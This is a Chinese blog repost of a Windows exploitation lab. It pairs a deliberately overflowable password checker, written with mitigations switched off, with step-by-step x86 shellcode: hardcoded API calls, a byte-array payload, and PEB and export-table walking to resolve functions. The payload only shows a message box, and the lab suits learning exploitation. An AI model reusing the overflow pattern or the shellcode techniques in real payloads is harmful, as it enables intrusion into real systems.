ShellCode

最新推荐文章于 2024-04-17 02:46:25 发布
最新推荐文章于 2024-04-17 02:46:25 发布
阅读量324 收藏
点赞数
文章标签: 数据结构与算法
原文链接:http://www.cnblogs.com/ltyandy/p/11343855.html
版权


典型栈溢出A-代码分析

ShellCode-A

#include "pch.h"
#include <iostream>
#include <Windows.h>
#define PASSWORD "15PB"
// GS: 用于判断当前是否产生了溢出,依赖的是检查安全 cookie, CheckStackValue
// inline: 没有关闭代码优化,导致一些简单的代码被直接内联了
// dep: 这个程序中不关闭 DEP 会导致 shellcode 无法执行
// aslr: 地址空间随机化,栈和加载基址等都不是固定的,需要关闭它
int VerifyPassword(char *pszPassword, int nSize)
{
    // szBuffer 是溢出的数组,溢出的数据被保存在这个位置
    char szBuffer[50] = {0};
    // 崩溃产生的原因是 nSize 作为拷贝的大小,超出了栈的范围
    memcpy(szBuffer, pszPassword, nSize);
    return strcmp(PASSWORD, szBuffer);
}

int main()
{
    int nFlag = 0;
    char szPassword[0x200] = {0};
    int nFileSize = 0;
    FILE *fp;
    LoadLibraryA("user32.dll");
    if (NULL==(fp=fopen("password.txt","rb")))
    {
        MessageBoxA(NULL, "打开文件失败", "error", NULL);
        exit(0);
    }
    fseek(fp, 0, SEEK_END);
    nFileSize = ftell(fp);
    rewind(fp);
    fread(szPassword, nFileSize, 1, fp);
    nFlag = VerifyPassword(szPassword, nFileSize);
    if (nFlag)
    {
        printf("密码错误");
    }
    else
    {
        printf("密码正确");
    }
    fclose(fp);
    system("pause");
    return 0;
}

禁用安全检查

1565589379281

禁用优化

1565589513405

禁用随机地址

1565630796541

在同个文件夹下面创建password.txt。输入很多A,让程序崩溃。

控制面板-管理工具-日志-程序应用

1565591056365

因为我输入的是全部A的一长串,所以这里显示41是A的ascii吗。

1565591678067

1565592486057

找到的MessageBoxA地址是76FA1F85

用010Editor修改。会弹出白框。

1565630986597

1565595231639

ShellCode-B

1565599207778

1565599640353

1565599920615

#include "pch.h"
#include <iostream>
#include <windows.h>
int main()
{
    __asm
    {
        SUB ESP, 0x20
        JMP tag_Shellcode
        _asm _emit(0x70)_asm _emit(0x1F)_asm _emit(0xFA)_asm _emit(0x76)
        _asm _emit(0x20)_asm _emit(0x4F)_asm _emit(0x2F)_asm _emit(0x77)
        _asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)
        _asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)
        _asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)_asm _emit(0x48)
        _asm _emit(0x00)
        tag_Shellcode:
                     CALL tag_Next
                         tag_Next :
                     POP ESI
                         XOR EDX, EDX
                         LEA EDI, [ESI - 0X12]
                         MOV EAX, [ESI - 0X1A]
                         PUSH EDX
                         PUSH EDI
                         PUSH EDI
                         PUSH EDX
                         CALL EAX
                         MOV EAX, [ESI - 0X16]
                         PUSH EDX
                         CALL EAX
    }
    MessageBoxA(0, 0, 0, 0);
}

详细讲解:

ShellCode-C

#include <windows.h>

// 定义成数组是为了让字符串不被保存在常量区
char shellcode[] = "\x83\xEC\x20\xEB\x15\x80\x03\xB4\x77\xF0\x58\x72\x77\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5E\x33\xD2\x8D\x7E\xEE\x8B\x46\xE6\x52\x57\x57\x52\xFF\xD0\x8B\x46\xEA\x52\xFF\xD0";

// dep: 数据执行保护,防止数据区域被作为代码执行

int main()
{
    /*__asm
    {
        ; 如果没有开辟栈帧,那么在操作 ebp 和 esp 的地址时,极有可能
        ; 会覆盖掉已执行或未执行的 shellcode 代码,所以通常需要开辟空间
        ; 并且开辟的大小应该要大于 OPCODE 的长度
        sub esp, 0x20
        ; 跳转到 shellcode 区域
        jmp tag_Shellcode
        ; (getpc() - 0x1A) MessageBoxA 的地址,由于通常使用小端存储,需要按字节颠倒顺序
        _asm _emit(0x80) _asm _emit(0x03) _asm _emit(0xB4) _asm _emit(0x77)
        ; (getpc() - 0x16) ExitProcess 的地址,同样通过 ctrl + g 找到的
        _asm _emit(0xF0) _asm _emit(0x58) _asm _emit(0x72) _asm _emit(0x77)
        ; (getpc() - 0x12) Hello 15Pb 字符串,_emit 添加一个字符到所在位置
        _asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x6C)
        _asm _emit(0x6F) _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6F)
        _asm _emit(0x72) _asm _emit(0x6C) _asm _emit(0x64) _asm _emit(0x21)
        _asm _emit(0x00)

        ; 使用了 GetPC 技术,用于获取一个基址,作为参照物
    tag_Shellcode:
        call tag_next
    tag_next:
        ; call 会使当前指令的地址入栈, pop 获取了当前指令地址
        ; 将当前指令所在的地址,作为想要查找的数据的参照基址
        pop esi

        ; 获取函数地址和参数,并且调用 MessageBoxA
        xor edx, edx
        lea edi, [esi - 0x12]
        mov eax, [esi - 0x1A]
        push edx
        push edi
        push edi
        push edx
        call eax

        ; 获取 ExitProcess 函数,退出程序
        mov eax, [esi - 0x16]
        push edx
        call eax
    }*/

    __asm
    {
        lea eax, shellcode
        push eax
        ret
    }

    // 为了让当前程序中存在 MessageBoxA 这个函数
    MessageBoxA(0, 0, 0, 0);
}

// 通过使用 jmp esp 地址覆盖返回地址,使 ret 时,跳转到 jmp esp 指令 位置
// jmp esp 的地址会因为 ret 而被 pop 出来,所以 shellcode 需要紧跟着写在
// jmp esp 地址的后面。

ShellCode-G


#include "pch.h"
#include <iostream>
#include <windows.h>
int main()
{
    __asm
    {
        PUSHAD
        SUB ESP, 0x20          //开辟一段栈空间,增加健壮性。
        JMP tag_Shellcode   //前置代码,避免后面的数据被解释为指令 

         // GetProcAddress
         // [tag_Next-0x51] 
        _asm _emit(0x47)_asm _emit(0x65)_asm _emit(0x74)_asm _emit(0x50)
        _asm _emit(0x72)_asm _emit(0x6F)_asm _emit(0x63)_asm _emit(0x41)
        _asm _emit(0x64)_asm _emit(0x64)_asm _emit(0x72)_asm _emit(0x65)
        _asm _emit(0x73)_asm _emit(0x73)_asm _emit(0x00)

        // LoadLibraryExA\0
        // [tag_Next-0x43]        
        _asm _emit(0x4C)_asm _emit(0x6F)_asm _emit(0x61)_asm _emit(0x64)
        _asm _emit(0x4C)_asm _emit(0x69)_asm _emit(0x62)_asm _emit(0x72)
        _asm _emit(0x61)_asm _emit(0x72)_asm _emit(0x79)_asm _emit(0x45)
        _asm _emit(0x78)_asm _emit(0x41)_asm _emit(0x00)

        // User32.DLL\0
        // [tag_Next-0x34]          
        _asm _emit(0x55)_asm _emit(0x73)_asm _emit(0x65)_asm _emit(0x72)
        _asm _emit(0x33)_asm _emit(0x32)_asm _emit(0x2E)_asm _emit(0x64)
        _asm _emit(0x6C)_asm _emit(0x6C)_asm _emit(0x00)

        // MessageBoxA\0
        // [tag_Next-0x19]  
        _asm _emit(0x4D)_asm _emit(0x65)_asm _emit(0x73)_asm _emit(0x73)
        _asm _emit(0x61)_asm _emit(0x67)_asm _emit(0x65)_asm _emit(0x42)
        _asm _emit(0x6F)_asm _emit(0x78)_asm _emit(0x41)_asm _emit(0x00)

        // ExitProcess\0
        // [tag_Next-0x1D]         
        _asm _emit(0x45)_asm _emit(0x78)_asm _emit(0x69)_asm _emit(0x74)
        _asm _emit(0x50)_asm _emit(0x72)_asm _emit(0x6F)_asm _emit(0x63)
        _asm _emit(0x65)_asm _emit(0x73)_asm _emit(0x73)_asm _emit(0x00)

        // HelloWorld!\0
        // 因为Call tag_Next=push eip+jmp tag_Next的地址.
        // 所以这里是[tag_Next-0x11]
        // -0x12是因为这里_emit插入了12个字符,机器码位置+12+5个call的字节之后就是tag_Next的机器码位置。
        _asm _emit(0x48)_asm _emit(0x65)_asm _emit(0x6C)_asm _emit(0x6C)
        _asm _emit(0x6F)_asm _emit(0x20)_asm _emit(0x57)_asm _emit(0x6F)
        _asm _emit(0x72)_asm _emit(0x6C)_asm _emit(0x64)_asm _emit(0x00)



// 1.GetPC
tag_Shellcode:
CALL tag_Next                   
tag_Next :
pop ebx     //ebx = BaseAddr

// 2.获取关键模块基址
mov esi,dword ptr fs:[0x30] // esi = PEB的地址
mov esi,[esi+0x0C]          // esi = 指向PEB_LDR_DATA结构的指针
mov esi,[esi+0x1C]          // esi = 模块链表指针InInit..List
mov esi,[esi]               // esi = 访问链表中的第二个条目
mov edx,[esi+0x08]          // edx = 获取Kernel32.dll基址
// 3.获取GetProcAddress的函数地址
push ebx                    // BaseAddr
push edx                    // Kernel32.dll
call fun_GetProcAddress
mov esi,eax

// 4.获取LoadLibraryExA的函数地址
lea ecx,[ebx-0x43]          // LoadLibraryEXw
push ecx            // 传参-lpProcName=LoadLibraryExA
push edx            // 传参-hModule=Kernel32.dll
call eax            // GetProcAddress

// 5.调用Payload部分
push ebx        //BaseAddr
push esi        //Addr_GetProcAddress
push eax        //Addr_LoadLibraryExA
push edx        //Kernerl32.dll
call fun_Payload        //调用Payload

//
// 函数:获取关键函数地址,返回值为关键函数地址
//
fun_GetProcAddress://(int ImageBase,int BaseAddr)
push ebp
mov ebp,esp
sub esp,0x0C
push edx

// 获取EAT ENT EOT
mov edx,[ebp+0x08]       // 第二个参数Kernel32.dll
mov esi,[edx+0x3C]       // IMAGE_DOS_HEADER.E_LFANEW
lea esi,[edx+esi]        // PE文件头VA
mov esi,[esi+0x78]       // IMAGE_DIR...EXPORT.VirtualAddress
lea esi,[edx+esi]        // 导出表VA
mov edi,[esi+0x1C]       // IMAGE_EXP...ORY.AddressOfFuntions
lea edi,[edx+edi]        // EAT VA
mov [ebp-0x04],edi       // LOCAL_1 
mov edi,[esi+0x20]       // IMAGE_EXP...ORY.AddressOfNames
lea edi,[edx+edi]        // ENT VA 
mov [ebp-0x08],edi       // LOCAL_2
mov edi,[esi+0x24]       // IMAGE_EXP...ORY.AddressOfNameOrdinals 
lea edi,[edx+edi]        // EOT VA
mov [ebp-0x0C],edi       // LOCAL_3

xor eax,eax              // 清零
jmp tag_FirstCmp         
tag_CmpFunNameLoop:      //
inc eax                  // 循环计数增加1


tag_FirstCmp:            

mov esi,[ebp-0x08]       // LOCAL_2 ENT
mov esi,[esi+4*eax]      // ENT RVA 数组 eax为i
mov edx,[ebp+0x08]       // PARAM_1 =IMAGEBASE
lea esi,[edx+esi]        // ENT VA=IMAGEBASE+RVA
mov ebx,[ebp+0x0C]       // PARAM_2 =BaseAddr
lea edi,[ebx-0x52]       // GetProcAddress
mov ecx,0x0E             // GetProcAddress长度
cld 
repe cmpsb 
jne tag_CmpFunNameLoop   // 如果不相等就继续比较
// 3.成功后找到对应的序号
mov esi,[ebp-0x0C]       // LOCAL_3(EOT)
xor edi,edi
mov di,[esi+eax*2]       // 用函数名数组下标在序号数组找到对应的序号
// 4.使用序号作为索引,找到函数名所对应的函数地址
mov edx,[ebp-0x04]       // LOCAL_1(EAT)
mov esi,[edx+edi*4]      // 用序号在函数地址数组找到对应的函数地址
mov edx,[ebp+0x08]       // PARAM_1(ImageBase)
// 5.返回获取到的关键函数地址
lea eax,[edx+esi]        //GetProcAddress的地址
pop edx
mov esp,ebp
pop ebp
retn 0x08

//
//函数:有效载荷部分,返回值为NULL
//

fun_Payload://(int Kernel32_Base,int LoadLibraryExW,int GetProcAddress,int BaseAddr)

PUSH EBP
MOV EBP,ESP
SUB ESP,0x08
MOV EBX,[EBP+0x14]       // PARAM_4(BaseAddr)
// 1.获取MessageBoxA的地址
LEA ECX,[EBX-0x34]       // User32.dll
PUSH 0     // dwFlags=0
PUSH 0     // hFile =0
PUSH ECX     // lpLibFileName =User32.dll
CALL [EBP+0X0C]     // LoadLibraryExA()
LEA ECX,[EBX-0X29]     // MessageBoxA
PUSH ECX     // lpProcName=MessageBoxA
PUSH EAX     // hMoudule =User32.dll基址
CALL [EBP+0X10]     // GetProcAddress()
MOV [EBP-0X04],EAX  
// 2.获取ExitProcess的函数地址
LEA ECX,[EBX-0X1D]       // ExitProcess
PUSH ECX                 // lpProcName=ExitProcess
PUSH [EBP+0X08]          // hModule =Kernel32.dll
CALL [EBP+0X10]          // GetProcAddress()
MOV [EBP-0X08],EAX       
// 3.显示helloworld
LEA ECX,[EBX-0X11]  // Hello World
PUSH 0  // uType
PUSH ECX  // lpCaption
PUSH ECX  // lpText
PUSH 0  // hWnd
CALL [EBP-0X04]  // MessageBoxA()
PUSH 0  // uExitCode=0
CALL [EBP-0X08]  // ExitProcess()
MOV ESP,EBP  
POP EBP  
RETN 0X10  
    }

}

转载于:https://www.cnblogs.com/ltyandy/p/11343855.html

weixin_30954607
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Custom Shellcode
05-16
Custom Shellcode 代码参考.
免杀入门---shellcode免杀
LvHLong的博客
05-03 5467
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2484
个人shellcode相关网络资源学习记录
codeshell安装配置(2),2024年最新2024最新Golang开发者学习路线
最新发布
2401_84240369的博客
04-17 1826
使用环境,但是本地还没有最底层的模型文件,所以需要单独下载模型文件,才能真正使用。(img-fLsQtp3e-1713293174148)](这里每个人不一样,要根据查出来的版本做修改。,无报错代表导入成功(这里要等待一段时间)。3. 看见如下图的示例,表示环境创建完毕。),然后粘贴上一步的指令,回车执行。【下载依赖较多,耗时较长】。激活环境,看到左下角改变为。下载安装包,注意最好下载。服务,服务启动后,可以通过。6. 输入y确认,回车。,激活py310环境(,也就是低版本的,因为。,查看安装了哪些包。
Shellcode
weixin_43916678的博客
07-07 8931
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
codeshell安装配置
Mr_XiMu的博客
10-24 2650
codeshell安装配置
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8954
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
shellcode加载器
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
shellcode分析工具.zip
05-25
用来加载shellcode的程序,execsc.exe是cuckoo自带的,sc_test.exe是导师给的。
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s <format> ...
威胁分析与响应能力—Shellcode分析与检测技巧
qq_44005305的博客
08-30 955
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
ShellCode原理以及编写
qq_18811919的博客
07-02 2847
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
shellCode免杀技巧
qq_39330735的博客
05-15 2290
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
shellcode
赵花花08042的博客
01-28 4108
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
shellcode基本知识(PWN)
weixin_51758733的博客
07-15 829
shellcode基本知识(PWN)
Shellcode编码技术
2301_77498991的博客
04-28 721
也就是我们在执行真正的costom_decoder之前将esp调整到nSEH之前,和costom_decoder本身之前,留下足够的opcode空间。因此,我们用0减去re_opcode,就可以得到opcode,为什么用减法而不是加法直接得到opecode呢,以eax为例,sub eax, xx指令是‘\x2d'合法的,而add eax, xx是”\x81\xC0“。为了更好的确定地址,我们将egg hunter放在payload的首,在nSEH处跳到调整edx的代码。所以egg hunter是可行的。
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1219
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
shellcode学习总结
bcbobo21cn的专栏
05-09 1553
shellcode Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值